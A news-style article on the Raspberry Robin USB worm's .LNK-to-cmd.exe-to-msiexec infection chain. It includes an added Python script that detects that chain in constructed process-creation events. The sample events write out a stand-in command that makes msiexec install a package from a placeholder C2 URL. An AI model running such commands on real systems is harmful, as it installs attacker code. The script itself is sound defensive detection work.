USB Flash Drive Malware Is Infecting Windows Devices. Researchers at Red Canary, a cybersecurity company, have discovered a new worm-like malware that targets Windows devices via infected USB drives. The researchers did not name the specific malware sample, but they linked it to a “cluster of malicious activity” they call Raspberry Robin. The malware has been found on endpoints belonging to organizations in the manufacturing and technology sectors.
The worm spreads to new devices through a malicious link (.LNK) file that is triggered once an infected USB drive is plugged in. The link file starts cmd.exe, which reads and runs a file stored on the drive. The malware then uses the Microsoft Standard Installer (msiexec.exe), a legitimate signed Windows binary that adversaries abuse to fetch and install attacker-controlled packages, to deliver its payload. The researchers also observed the worm attempting to reach a malicious domain for command-and-control (C2).
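The chain above (cmd.exe running a file from removable media, then msiexec.exe pulling a package from a remote URL) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not Red Canary's code or their published detection logic: it runs three simple rules over constructed Sysmon-style process-creation records. The host names, PIDs, file names, the E: drive letter and the .invalid domain are placeholders, and treating any drive letter other than C: as candidate removable media is a stated heuristic, not a guarantee.

```python
"""Hunt for the USB link-file -> cmd.exe -> msiexec.exe chain.

Added example with constructed events; not the vendor's code or real telemetry.
"""
import re
from typing import Dict, Iterable, List

# Assumption: the OS lives on C:, so any other drive letter is a candidate
# removable drive. Real telemetry should cross-check against device events.
SYSTEM_DRIVE = "C:"

DRIVE_PATH = re.compile(r"\b([A-Z]):\\", re.IGNORECASE)   # e.g. E:\file.bin
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)     # http(s) URL in a command line

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
SAMPLE_EVENTS: List[Dict] = [
    # benign: explorer.exe launching an ordinary command prompt
    {"host": "ws01", "pid": 4100, "ppid": 1200,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "ws01", "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" '},
    # suspicious: cmd.exe started via the link file, reading a file on the E: drive
    {"host": "ws01", "pid": 4132, "ppid": 4100,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /R <E:\data.bin"},
    # suspicious: msiexec.exe fetching a package over HTTP, parented by that cmd.exe
    {"host": "ws01", "pid": 4150, "ppid": 4132,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /q /i http://c2.example.invalid/x.msi"},
    # benign: msiexec.exe installing a local package from the system drive
    {"host": "ws02", "pid": 900, "ppid": 880,
     "image": r"C:\Windows\System32\msiexec.exe", "cmdline": r"msiexec /i C:\Temp\app.msi /qn"},
]


def basename(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def flag_cmd_from_removable(ev: Dict) -> bool:
    """Rule 1: cmd.exe whose command line references a file on a non-system drive."""
    if basename(ev["image"]) != "cmd.exe":
        return False
    letters = {m.group(1).upper() + ":" for m in DRIVE_PATH.finditer(ev["cmdline"])}
    return any(d != SYSTEM_DRIVE for d in letters)


def flag_msiexec_remote(ev: Dict) -> bool:
    """Rule 2: msiexec.exe asked to install a package from an http(s) URL."""
    return basename(ev["image"]) == "msiexec.exe" and URL.search(ev["cmdline"]) is not None


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Apply the rules and correlate parent/child to flag the full chain (rule 3)."""
    events = list(events)
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings: List[Dict] = []
    for ev in events:
        if flag_cmd_from_removable(ev):
            findings.append({"rule": "cmd_from_removable", "host": ev["host"], "pid": ev["pid"]})
        if flag_msiexec_remote(ev):
            findings.append({"rule": "msiexec_remote_install", "host": ev["host"], "pid": ev["pid"]})
            # Rule 3: the msiexec parent is a cmd.exe that itself read from removable media
            parent = by_pid.get((ev["host"], ev["ppid"]))
            if parent is not None and flag_cmd_from_removable(parent):
                findings.append({"rule": "usb_lnk_to_msiexec_chain", "host": ev["host"],
                                 "pid": ev["pid"], "parent_pid": parent["pid"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Rules 1 and 2 each fire on their own (a single msiexec.exe install from a URL is worth a look in most environments), while rule 3 links the two through the parent PID so a triage queue sees one high-confidence chain rather than two loosely related alerts. Drive-letter heuristics are noisy on hosts with mapped or second fixed drives, so in production the removable-media check should be tied to actual device telemetry rather than the letter alone.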
However, the researchers are still unsure of the malware’s objective. One hypothesis is that the malicious DLL installed by Raspberry Robin is meant to establish persistence on the infected system, but further evidence is needed to confirm this.
The malware’s ability to spread offline through USB drives is a significant concern, since propagation does not depend on network access and any device the drive is plugged into can be infected. The targeting of manufacturing and technology organizations is also worrying: these sectors include critical infrastructure operators, for whom a malware infection can have severe operational consequences.
USB drives are still widely used to transfer files between devices, which makes them an attractive delivery vector for cybercriminals. Organizations should therefore treat removable media with caution, especially drives obtained from unknown sources, and should consider technical controls such as restricting or auditing removable storage and monitoring for cmd.exe and msiexec.exe launching from, or installing from, unexpected locations.
In conclusion, the discovery of Raspberry Robin highlights the ongoing threat that malware poses to Windows devices. Its ability to spread offline through USB drives and its presence in critical sectors underline the importance of remaining vigilant and implementing robust security controls to prevent and contain such infections.